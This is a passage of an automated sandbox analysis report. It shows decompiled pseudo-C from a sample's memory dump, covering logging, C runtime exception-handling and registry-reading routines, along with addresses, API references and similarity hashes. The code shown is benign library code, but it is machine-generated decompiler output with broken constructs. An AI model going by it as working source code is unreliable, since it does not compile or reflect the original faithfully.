				signed char _t157;
				char* _t168;
				void* _t169;
				intOrPtr _t171;
				intOrPtr _t173;
				intOrPtr _t175;
				intOrPtr _t177;
				CHAR* _t183;
				intOrPtr _t185;
				signed int _t192;
				signed int _t195;
				void* _t200;
				void* _t206;
				void* _t214;
				void* _t217;
				signed int _t218;
				long _t223;
				intOrPtr* _t236;
				intOrPtr _t243;
				signed int _t244;
				signed int _t246;
				intOrPtr _t248;
				intOrPtr _t251;
				intOrPtr _t261;
				intOrPtr _t265;
				char* _t266;
				CHAR* _t268;
				char* _t272;
				intOrPtr _t274;
				void* _t275;
				intOrPtr _t277;
				long _t283;
				intOrPtr _t285;
				DWORD* _t288;
				CHAR* _t291;
				intOrPtr _t293;
				signed int _t294;
				signed int _t296;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t310;
				void* _t333;

				_t344 = __fp0;
				_t263 = __edx;
				_t294 = _t296;
				_push(_t217);
				_t297 = _t296 - 0x43c;
				_t139 =  *0xd40014; // 0xfbddd969
				_v20 = _t139 ^ _t294;
				 *((intOrPtr*)(__ecx)) = 0xd2f06c;
				_t268 = __ecx + 8;
				_v1084 = __ecx;
				_t280 =  &_v1044;
				_v1092 = __ecx + 0xc;
				E00C91AD0(_t139 ^ _t294, _t217, __ecx + 0xc, _t268, __fp0,  &_v1044);
				_t218 = _v1033 & 0x000000ff;
				_t303 = _t218;
				if(_t218 < 0) {
					_t218 = _v1040;
					L00CFDBEC(_v1044);
					_t297 = _t297 + 4;
				}
				_v1096 = _t218;
				L00C9AD2A( *((intOrPtr*)( *_t268 + 4)) + _t268, _t280);
				_t144 = L00CAED38(_t218, _t280, _t263, _t268, _t303, 0xd46280);
				_v1088 = _t268;
				 *0xd57000();
				_t219 =  *((intOrPtr*)( *((intOrPtr*)( *_t144 + 0x1c))))(0xa);
				L00C9CCBE( &_v1044);
				E00C91360(_v1088, _t147);
				E00C907A0(_v1088);
				_v1076 = 0xffffffff;
				_v1072 = 0xffffffff;
				_v1068 = 0xffffffff;
				_t270 = _v1092;
				_v1088 =  &_v1076;
				E00C91AD0( &_v1076, _t147, _v1092, _v1092, _t344,  &_v1076);
				_t283 = _v1084;
				if(( *0xd420ec & 0x00000019) != 0) {
					_v1044 = _t283;
					_v1040 =  &_v1076;
					_t263 = 0;
					L00CBCD90("LogMessage", 0, __eflags, _t344, 0,  &_v1044);
					_t297 = _t297 + 8;
					__eflags =  *((intOrPtr*)(_t283 + 4)) - 3;
					if(__eflags == 0) {
						L4:
						if( *0xd469b4 == 0) {
							 *0xd469b4 = 1;
							_t207 =  *0xd469bc;
							_t263 =  *[fs:0x2c];
							if( *0xd469bc >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] +  *0xd43e38 * 4)) + 4))) {
								_t207 = L00CFDC67(_t207, 0xd469bc);
								_t297 = _t297 + 4;
								__eflags =  *0xd469bc - 0xffffffff;
								if( *0xd469bc == 0xffffffff) {
									 *0xd469b8 = E00CC7200("LOG_FATAL", 0x400);
									_t207 = L00CFDCDD(0xd469bc);
									_t297 = _t297 + 0xc;
								}
							}
							_t223 =  &_v1044;
							E00C91AD0(_t207, _t223, _t270, _t270, _t344, _t223);
							if(_v1033 < 0) {
								_t223 = _v1044;
							}
							_t219 = _t223 +  *((intOrPtr*)(_t283 + 0x90));
							_t277 =  *((intOrPtr*)(_t283 + 0x94));
							_t293 =  *((intOrPtr*)(_t283 + 0x98));
							if(_t277 == 0) {
								_t261 = 0;
								__eflags = 0;
							} else {
								_t214 = E00D01430(_t277, 0x5c);
								_t297 = _t297 + 8;
								_t310 = _t214;
								_t261 =  ==  ? _t277 : _t214 + 1;
							}
							_t278 =  &_v1064;
							_push(_t219);
							_push(_t293);
							L00CC6F40(_t219,  &_v1064, _t310,  &_v1064, "%s:%d: %s", _t261);
							_t301 = _t297 + 0x14;
							if(_v1033 < 0) {
								L00CFDBEC(_v1044);
								_t301 = _t301 + 4;
							}
							_t210 = _v1053 & 0x000000ff;
							_t283 = _v1084;
							if((_v1053 & 0x000000ff) < 0) {
								_t278 = _v1064;
								_t210 = _v1060;
							}
							E00CC7240( *0xd469b8, _t278, _t210);
							_t297 = _t301 + 0xc;
							if(_v1053 < 0) {
								L00CFDBEC(_v1064);
								_t297 = _t297 + 4;
							}
							 *0xd469b4 = 0;
							_t270 = _v1092;
						}
						L18:
						_t236 =  *0xd4698c; // 0x0
						if(_t236 == 0) {
							L20:
							_t157 =  *0xd41be0; // 0x1
							if((_t157 & 0x00000002) != 0) {
								if(_v1065 < 0) {
									_v1088 = _v1076;
								}
								OutputDebugStringA(_v1088);
								_t157 =  *0xd41be0;
							}
							if((_t157 & 0x00000004) != 0 ||  *((intOrPtr*)(_t283 + 4)) >= 2 && _t157 <= 1) {
								_t219 =  <  ? _v1072 : _v1065 & 0x000000ff;
								_t283 =  <  ? _v1076 :  &_v1076;
								if(_t219 != 0) {
									_t275 = 0;
									asm("o16 nop [cs:eax+eax]");
									while(1) {
										_t200 = E00D105EE(_t219, _t275, 2, _t283 + _t275, _t219 - _t275);
										_t297 = _t297 + 0xc;
										if(_t200 < 0) {
											break;
										}
										_t275 = _t275 + _t200;
										if(_t275 < _t219) {
											continue;
										}
										break;
									}
									_t157 =  *0xd41be0;
									_t270 = _v1092;
								}
								goto L32;
							} else {
								L32:
								if((_t157 & 0x00000001) != 0 && L00CBBC70(_t219, _t270, _t283, _t344) != 0) {
									_v1044 = 0xffffffff;
									_t195 = _v1065 & 0x000000ff;
									_t196 =  <  ? _v1072 : _t195;
									_t256 =  <  ? _v1076 :  &_v1076;
									_t263 =  &_v1044;
									WriteFile( *0xd46998,  <  ? _v1076 :  &_v1076,  <  ? _v1072 : _t195,  &_v1044, 0);
								}
								_t285 = _v1084;
								if( *((intOrPtr*)(_t285 + 4)) != 3) {
									L60:
									if(_v1065 < 0) {
										L00CFDBEC(_v1076);
										_t297 = _t297 + 4;
									}
									E00CC53F0(_t285 + 0x9c);
									 *((intOrPtr*)(_t285 +  *((intOrPtr*)( *((intOrPtr*)(_t285 + 8)) + 4)) + 8)) = 0xd2f544;
									 *((intOrPtr*)(_t285 + 0xc)) = 0xd2f550;
									if( *((char*)(_t285 + 0x37)) < 0) {
										L00CFDBEC( *((intOrPtr*)(_t285 + 0x2c)));
										_t297 = _t297 + 4;
									}
									E00C90790(E00C9041E(_t270));
									return E00CFE643(E00C90414(_t285 + 0x40), _t219, _v20 ^ _t294, _t263, _t270, _t285 + 0x40);
								} else {
									_t243 =  *0xd51278; // 0x0
									_t288 =  &_v1044;
									if(_t243 != 0) {
										_t192 = _v1065 & 0x000000ff;
										_t330 = _t192;
										if(_t192 >= 0) {
											_t266 =  &_v1076;
										} else {
											_t266 = _v1076;
											_t192 = _v1072;
										}
										E00CC65F0(_t243, _t330, _t266, _t192);
									}
									E00D011A0(_t270, _t288, 0xff, 0x400);
									_t299 = _t297 + 0xc;
									if(_v1065 >= 0) {
										_t168 =  &_v1076;
									} else {
										_t168 = _v1076;
									}
									_t169 = E00CC40B0(_t288, _t168, 0x400);
									_push(_t288);
									E00C90790(_t169);
									_t297 = _t299 + 0x10;
									_t171 =  *0xd469b0; // 0x0
									_t244 =  *0xd43e38; // 0x0
									if(_t171 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t244 * 4)) + 4))) {
										L00CFDC67(_t171, 0xd469b0);
										_t297 = _t297 + 4;
										__eflags =  *0xd469b0 - 0xffffffff;
										if( *0xd469b0 == 0xffffffff) {
											asm("xorps xmm0, xmm0");
											asm("movups [0xd469a0], xmm0");
											L00CFDCDD(0xd469b0);
											_t297 = _t297 + 4;
										}
									}
									_t173 =  *0xd469a8; // 0x0
									_t333 = _t173 -  *0xd469ac; // 0x0
									if(_t333 == 0) {
										asm("int3");
										asm("ud2");
										goto L74;
									} else {
										_v1080 = 0xffffffff;
										_t175 =  *0xd469b0; // 0x0
										_t246 =  *0xd43e38; // 0x0
										_t263 =  *[fs:0x2c];
										if(_t175 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t246 * 4)) + 4))) {
											L00CFDC67(_t175, 0xd469b0);
											_t297 = _t297 + 4;
											__eflags =  *0xd469b0 - 0xffffffff;
											if( *0xd469b0 == 0xffffffff) {
												asm("xorps xmm0, xmm0");
												asm("movups [0xd469a0], xmm0");
												L00CFDCDD(0xd469b0);
												_t297 = _t297 + 4;
											}
										}
										_t177 =  *0xd469ac; // 0x0
										_t248 =  *0xd469a4; // 0x0
										_t178 =  ==  ? _t248 : _t177;
										_t179 = ( ==  ? _t248 : _t177) - 1;
										if(_t248 < ( ==  ? _t248 : _t177) - 1) {
											L74:
											asm("int3");
											asm("ud2");
											goto L75;
										} else {
											E00CC5370( &_v1080, _t270, (_t179 << 2) +  *0xd469a0);
											_t183 = _v1080;
											if(_t183 == 0) {
												L59:
												E00CC5340( &_v1080);
												_t285 = _v1084;
												goto L60;
											}
											if(_v1065 >= 0) {
												_t272 =  &_v1076;
											} else {
												_t272 = _v1076;
											}
											_t219 = _t272 + _v1096;
											_v1088 = _t183;
											if(_t219 == 0) {
												_t185 = 0;
												__eflags = 0;
											} else {
												_t185 = E00D131A0(_t219);
												_t297 = _t297 + 4;
											}
											_t265 = _v1084;
											_t251 =  *((intOrPtr*)(_t265 + 0x90));
											_v1096 =  *((intOrPtr*)(_t265 + 0x94));
											_v1100 =  *((intOrPtr*)(_t265 + 0x98));
											_v1064 = _t272 + _t251;
											_v1060 = _v1096 - _t251;
											_v1052 = _t219;
											_v1048 = _t185;
											_t291 = _v1088;
											asm("lock xadd [esi], eax");
											if(1 <= 0) {
												L75:
												asm("int3");
												asm("ud2");
												asm("int3");
												_push(_t294);
												return GetLastError();
											} else {
												_t274 = _v1080;
												 *0xd57000();
												_t263 =  &_v1064;
												 *((intOrPtr*)( *((intOrPtr*)(_t274 + 4))))(_t274, _v1096, _v1100,  &_v1064,  &_v1052);
												_t297 = _t297 + 0x14;
												asm("lock dec dword [esi]");
												if(1 == 0) {
													E00CC52B0(_t291);
													_t297 = _t297 + 4;
												}
												_t270 = _v1092;
												goto L59;
											}
										}
									}
								}
							}
						}
						_v1100 =  *((intOrPtr*)(_t283 + 4));
						_t219 =  *((intOrPtr*)(_t283 + 0x98));
						 *0xd57000();
						_t270 = _v1092;
						_t285 = _v1084;
						_t206 =  *_t236(_v1100,  *((intOrPtr*)(_v1084 + 0x94)),  *((intOrPtr*)(_t283 + 0x98)),  *((intOrPtr*)(_t283 + 0x90)),  &_v1076);
						_t297 = _t297 + 0x14;
						if(_t206 != 0) {
							goto L60;
						}
						goto L20;
					}
					goto L18;
				}
				if( *((intOrPtr*)(_t283 + 4)) != 3) {
					goto L18;
				}
				goto L4;
			}

0x00cbc360
0x00cbc360
0x00cbc361
0x00cbc363
0x00cbc366
0x00cbc36c
0x00cbc373
0x00cbc376
0x00cbc37c
0x00cbc37f
0x00cbc388
0x00cbc38e
0x00cbc395
0x00cbc39a
0x00cbc3a1
0x00cbc3a3
0x00cbc3a5
0x00cbc3b1
0x00cbc3b6
0x00cbc3b6
0x00cbc3b9
0x00cbc3c7
0x00cbc3d3
0x00cbc3d8
0x00cbc3e7
0x00cbc3f3
0x00cbc3fb
0x00cbc40c
0x00cbc413
0x00cbc418
0x00cbc422
0x00cbc42c
0x00cbc43c
0x00cbc444
0x00cbc44b
0x00cbc457
0x00cbc45d
0x00cbc91e
0x00cbc92a
0x00cbc935
0x00cbc940
0x00cbc945
0x00cbc948
0x00cbc94c
0x00cbc46d
0x00cbc474
0x00cbc47a
0x00cbc481
0x00cbc48c
0x00cbc49c
0x00cbc95c
0x00cbc961
0x00cbc964
0x00cbc96b
0x00cbc983
0x00cbc98d
0x00cbc992
0x00cbc992
0x00cbc96b
0x00cbc4a4
0x00cbc4ab
0x00cbc4b7
0x00cbc4b9
0x00cbc4b9
0x00cbc4bf
0x00cbc4c5
0x00cbc4cb
0x00cbc4d3
0x00cbc4ea
0x00cbc4ea
0x00cbc4d5
0x00cbc4d8
0x00cbc4dd
0x00cbc4e3
0x00cbc4e5
0x00cbc4e5
0x00cbc4ec
0x00cbc4f2
0x00cbc4f3
0x00cbc4fb
0x00cbc500
0x00cbc50a
0x00cbc512
0x00cbc517
0x00cbc517
0x00cbc51a
0x00cbc523
0x00cbc529
0x00cbc52b
0x00cbc531
0x00cbc531
0x00cbc53f
0x00cbc544
0x00cbc54e
0x00cbc556
0x00cbc55b
0x00cbc55b
0x00cbc55e
0x00cbc565
0x00cbc565
0x00cbc56b
0x00cbc56b
0x00cbc573
0x00cbc5c5
0x00cbc5c5
0x00cbc5cc
0x00cbc5d5
0x00cbc5dd
0x00cbc5dd
0x00cbc5e9
0x00cbc5ef
0x00cbc5ef
0x00cbc5f6
0x00cbc60c
0x00cbc619
0x00cbc622
0x00cbc624
0x00cbc626
0x00cbc630
0x00cbc63b
0x00cbc640
0x00cbc645
0x00000000
0x00000000
0x00cbc647
0x00cbc64b
0x00000000
0x00000000
0x00000000
0x00cbc64b
0x00cbc64d
0x00cbc652
0x00cbc652
0x00000000
0x00cbc658
0x00cbc658
0x00cbc65a
0x00cbc665
0x00cbc66f
0x00cbc678
0x00cbc685
0x00cbc68e
0x00cbc69d
0x00cbc69d
0x00cbc6a3
0x00cbc6ad
0x00cbc8a9
0x00cbc8b0
0x00cbc8b8
0x00cbc8bd
0x00cbc8bd
0x00cbc8c6
0x00cbc8d1
0x00cbc8d9
0x00cbc8e4
0x00cbc8e9
0x00cbc8ee
0x00cbc8ee
0x00cbc8fd
0x00cbc91d
0x00cbc6b3
0x00cbc6b3
0x00cbc6bb
0x00cbc6c1
0x00cbc6c3
0x00cbc6ca
0x00cbc6cc
0x00cbc6dc
0x00cbc6ce
0x00cbc6ce
0x00cbc6d4
0x00cbc6d4
0x00cbc6e4
0x00cbc6e4
0x00cbc6f4
0x00cbc6f9
0x00cbc703
0x00cbc70d
0x00cbc705
0x00cbc705
0x00cbc705
0x00cbc71a
0x00cbc722
0x00cbc723
0x00cbc728
0x00cbc72b
0x00cbc730
0x00cbc746
0x00cbc99f
0x00cbc9a4
0x00cbc9a7
0x00cbc9ae
0x00cbc9b4
0x00cbc9b7
0x00cbc9c3
0x00cbc9c8
0x00cbc9c8
0x00cbc9ae
0x00cbc74c
0x00cbc751
0x00cbc757
0x00cbca06
0x00cbca07
0x00000000
0x00cbc75d
0x00cbc75d
0x00cbc767
0x00cbc76c
0x00cbc772
0x00cbc782
0x00cbc9d5
0x00cbc9da
0x00cbc9dd
0x00cbc9e4
0x00cbc9ea
0x00cbc9ed
0x00cbc9f9
0x00cbc9fe
0x00cbc9fe
0x00cbc9e4
0x00cbc788
0x00cbc78f
0x00cbc795
0x00cbc798
0x00cbc79b
0x00cbca09
0x00cbca09
0x00cbca0a
0x00000000
0x00cbc7a1
0x00cbc7b1
0x00cbc7b6
0x00cbc7be
0x00cbc898
0x00cbc89e
0x00cbc8a3
0x00000000
0x00cbc8a3
0x00cbc7cb
0x00cbc7d5
0x00cbc7cd
0x00cbc7cd
0x00cbc7cd
0x00cbc7dd
0x00cbc7e3
0x00cbc7e9
0x00cbc7f6
0x00cbc7f6
0x00cbc7eb
0x00cbc7ec
0x00cbc7f1
0x00cbc7f1
0x00cbc7f8
0x00cbc7fe
0x00cbc814
0x00cbc820
0x00cbc826
0x00cbc82c
0x00cbc832
0x00cbc838
0x00cbc843
0x00cbc849
0x00cbc84f
0x00cbca0c
0x00cbca0c
0x00cbca0d
0x00cbca0f
0x00cbca10
0x00cbca14
0x00cbc855
0x00cbc855
0x00cbc85e
0x00cbc86a
0x00cbc87f
0x00cbc881
0x00cbc884
0x00cbc887
0x00cbc88a
0x00cbc88f
0x00cbc88f
0x00cbc892
0x00000000
0x00cbc892
0x00cbc84f
0x00cbc79b
0x00cbc757
0x00cbc6ad
0x00cbc5f6
0x00cbc578
0x00cbc584
0x00cbc596
0x00cbc5a4
0x00cbc5ac
0x00cbc5b8
0x00cbc5ba
0x00cbc5bf
0x00000000
0x00000000
0x00000000
0x00cbc5bf
0x00000000
0x00cbc952
0x00cbc467
0x00000000
0x00000000
0x00000000

Strings

LogMessage, xrefs: 00CBC930

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID:
String ID: LogMessage
API String ID: 0-3667181074
Opcode ID: 410d4022e2ccebed8864e7c493d7c3ea37ee6d82dd4a5a00bfc8ae53fd526687
Instruction ID: 98a189295840f8003fccff1131f57d4c4786b1d5b6fb68c27265b3b0a1553172
Opcode Fuzzy Hash: 410d4022e2ccebed8864e7c493d7c3ea37ee6d82dd4a5a00bfc8ae53fd526687
Instruction Fuzzy Hash: 6EB1B2B0E002288FDB20DF20DC85BE9B3B5AF45314F4441A9E61AA7351DB70AF85CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00D149EE Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 124
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 46%

			E00D149EE(void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v80;
				void* __ebx;
				void* __ebp;
				void* _t57;
				void* _t58;
				char _t59;
				intOrPtr* _t64;
				void* _t65;
				intOrPtr* _t70;
				void* _t73;
				signed char* _t76;
				intOrPtr* _t79;
				void* _t81;
				signed int _t85;
				signed int _t86;
				signed char _t91;
				signed int _t94;
				void* _t102;
				void* _t107;
				void* _t113;
				void* _t115;

				_t102 = __esi;
				_t93 = __edx;
				_t81 = __ecx;
				_t79 = _a4;
				if( *_t79 == 0x80000003) {
					return _t57;
				} else {
					_push(__esi);
					_push(__edi);
					_t58 = L00D13D51(_t79, __ecx, __edx, __edi, __esi);
					if( *((intOrPtr*)(_t58 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t102 = _t58;
						if( *((intOrPtr*)(L00D13D51(_t79, __ecx, __edx, 0, _t102) + 8)) != _t102 &&  *_t79 != 0xe0434f4d &&  *_t79 != 0xe0434352) {
							_t70 = E00CFF6E0(__edx, 0, _t102, _t79, _a8, _a12, _a16, _a20, _a28, _a32);
							_t113 = _t113 + 0x1c;
							if(_t70 != 0) {
								L16:
								return _t70;
							}
						}
					}
					_t59 = _a20;
					_v24 = _t59;
					_v20 = 0;
					if( *((intOrPtr*)(_t59 + 0xc)) > 0) {
						E00CFF590(_t81,  &_v40,  &_v24, _a24, _a16, _t59, _a28);
						_t94 = _v36;
						_t115 = _t113 + 0x18;
						_t70 = _v40;
						_v16 = _t70;
						_v8 = _t94;
						if(_t94 < _v28) {
							_t85 = _t94 * 0x14;
							_v12 = _t85;
							do {
								_t86 = 5;
								_t73 = memcpy( &_v60,  *((intOrPtr*)( *_t70 + 0x10)) + _t85, _t86 << 2);
								_t115 = _t115 + 0xc;
								if(_v60 <= _t73 && _t73 <= _v56) {
									_t76 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t91 = _t76[4];
									if(_t91 == 0 ||  *((char*)(_t91 + 8)) == 0) {
										if(( *_t76 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E00D1496E(_t94, _t79, _a8, _a12, _a16, _a20, _t76, 0,  &_v60, _a28, _a32);
											_t94 = _v8;
											_t115 = _t115 + 0x30;
										}
									}
								}
								_t94 = _t94 + 1;
								_t70 = _v16;
								_t85 = _v12 + 0x14;
								_v8 = _t94;
								_v12 = _t85;
							} while (_t94 < _v28);
						}
						goto L16;
					}
					E00D0E930(_t79, _t81, _t93, 0, _t102);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_v80 = _v64 + 0xc;
					_t64 = L00D14C80(_v68, _v60);
					_t65 =  *_t64(0, _t102, _t113, _t81, _t79, _t107);
					_pop(_t110);
					_t83 = _v60;
					if(_v60 == 0x100) {
						_t83 = 2;
					}
					return L00D14C80(_t65, _t83);
				}
			}

0x00d149ee
0x00d149ee
0x00d149ee
0x00d149f5
0x00d149fe
0x00d14b1d
0x00d14a04
0x00d14a04
0x00d14a05
0x00d14a06
0x00d14a10
0x00d14a13
0x00d14a19
0x00d14a23
0x00d14a48
0x00d14a4d
0x00d14a52
0x00d14b19
0x00000000
0x00d14b1a
0x00d14a52
0x00d14a23
0x00d14a58
0x00d14a5b
0x00d14a5e
0x00d14a64
0x00d14a7c
0x00d14a81
0x00d14a84
0x00d14a87
0x00d14a8a
0x00d14a8d
0x00d14a93
0x00d14a99
0x00d14a9c
0x00d14a9f
0x00d14aae
0x00d14aaf
0x00d14aaf
0x00d14ab4
0x00d14ac7
0x00d14ac9
0x00d14ace
0x00d14ad9
0x00d14adb
0x00d14add
0x00d14af9
0x00d14afe
0x00d14b01
0x00d14b01
0x00d14ad9
0x00d14ace
0x00d14b07
0x00d14b08
0x00d14b0b
0x00d14b0e
0x00d14b11
0x00d14b14
0x00d14a9f
0x00000000
0x00d14a93
0x00d14b1e
0x00d14b23
0x00d14b24
0x00d14b25
0x00d14b26
0x00d14b27
0x00d14b28
0x00d14b29
0x00d14b2a
0x00d14b2b
0x00d14b2c
0x00d14b2d
0x00d14b2e
0x00d14b2f
0x00d14b3e
0x00d14b4e
0x00d14b55
0x00d14b5b
0x00d14b5c
0x00d14b68
0x00d14b6a
0x00d14b6a
0x00d14b79
0x00d14b79

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D148F4,?,?,00000000,00000000,00000000,?), ref: 00D14A13
CatchIt.LIBVCRUNTIME ref: 00D14AF9

Strings

MOC, xrefs: 00D14A25
RCC, xrefs: 00D14A2D

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 63434ea9619b82e9b88780a036d09f3f6fb990e25932cf34c06921a0f0a2e009
Instruction ID: a70c4fa192ed6de0ecde93e41e9265700e25e3ae59571a434d6ce0e139cc1c1e
Opcode Fuzzy Hash: 63434ea9619b82e9b88780a036d09f3f6fb990e25932cf34c06921a0f0a2e009
Instruction Fuzzy Hash: 8B414771900209AFCF15DF98E981AEEBBB5EF48304F194069FA04A7221D635D9A0DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CD17E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 89
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00CD17E0(void** __ecx, void* __edx, void* __eflags, short* _a4, void** _a8) {
				signed int _v20;
				short _v2068;
				char _v4116;
				char _v4120;
				int _v4124;
				int _v4128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				long _t36;
				void** _t45;
				void* _t46;
				void* _t47;
				long _t49;
				void** _t50;
				signed int _t51;
				void* _t52;
				void* _t54;

				_t46 = __edx;
				L00CFEF60(0x1010);
				_t50 = __ecx;
				_t22 =  *0xd40014; // 0xfbddd969
				_v20 = _t22 ^ _t51;
				E00D011A0(_t47,  &_v2068, 0xff, 0x800);
				_v4124 = 1;
				_v4128 = 0x800;
				_v4120 = 0xff;
				_t38 =  &_v4116;
				L00CC4C80( &_v4116, "ReadValue", "..\\..\\base\\win\\registry.cc", 0x1ad);
				_t54 = _t52 + 0x1c;
				E00CE5A40( &_v4120,  &_v4116,  *_t50, 1);
				_t49 = RegQueryValueExW( *_t50, _a4, 0,  &_v4124,  &_v2068,  &_v4128);
				_t31 = E00C90790(_t30);
				if(_t49 == 0) {
					_t38 =  &_v4116;
					_t50 = _a8;
					_t31 = _v4124;
					if(_t31 == 2) {
						E00D011A0(_t49, _t38, 0xff, 0x800);
						_t54 = _t54 + 0xc;
						_t36 = ExpandEnvironmentStringsW( &_v2068, _t38, 0x400);
						_v4128 = _t36;
						_t31 = _t36 + 0xfffffbff;
						_t49 = 0xea;
						if(_t36 + 0xfffffbff >= 0xfffffc00) {
							_t45 = _t50;
							_push(_t38);
							goto L6;
						}
					} else {
						_t49 = 0x3f4;
						if(_t31 == 1) {
							_t45 = _t50;
							_push( &_v2068);
							L6:
							_t31 = E00CB581E(_t45);
							_t49 = 0;
						}
					}
				}
				E00CFE643(_t31, _t38, _v20 ^ _t51, _t46, _t49, _t50);
				return _t49;
			}

0x00cd17e0
0x00cd17eb
0x00cd17f0
0x00cd17f2
0x00cd17f9
0x00cd180d
0x00cd1815
0x00cd181f
0x00cd1829
0x00cd1832
0x00cd1848
0x00cd184d
0x00cd185a
0x00cd1881
0x00cd1889
0x00cd1890
0x00cd1892
0x00cd1898
0x00cd189b
0x00cd18a4
0x00cd18c6
0x00cd18cb
0x00cd18db
0x00cd18e1
0x00cd18e7
0x00cd18ec
0x00cd18f6
0x00cd18f8
0x00cd18fa
0x00000000
0x00cd18fa
0x00cd18a6
0x00cd18a6
0x00cd18ae
0x00cd18b0
0x00cd18b8
0x00cd18fb
0x00cd18fb
0x00cd1900
0x00cd1900
0x00cd18ae
0x00cd18a4
0x00cd1907
0x00cd1918

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,FFFFFFFF,00000001), ref: 00CD187B
ExpandEnvironmentStringsW.KERNEL32(?,?,00000400,?,FFFFFFFF,00000001), ref: 00CD18DB

Strings

ReadValue, xrefs: 00CD1842
..\..\base\win\registry.cc, xrefs: 00CD183D

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: EnvironmentExpandQueryStringsValue
String ID: ..\..\base\win\registry.cc$ReadValue
API String ID: 1756134249-2708835790
Opcode ID: b1377b02f88d2627f2119ff9dad95595bfdbb32174e20fbbe3619a104b457114
Instruction ID: 93ee5346409aeb9c4a93ac36699825a78edf098b70155e611ed9c2197df7786f
Opcode Fuzzy Hash: b1377b02f88d2627f2119ff9dad95595bfdbb32174e20fbbe3619a104b457114
Instruction Fuzzy Hash: F931F37194025CBBDB309A10CC42BEA737CAF44310F1444A6F699A72D1DAB49BC9AFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CC09A0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00CC09A0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* _v12;
				signed int _v16;
				signed int _v24;
				char _v92;
				char _v100;
				char _v108;
				char _v112;
				char _v116;
				intOrPtr _v120;
				intOrPtr _v124;
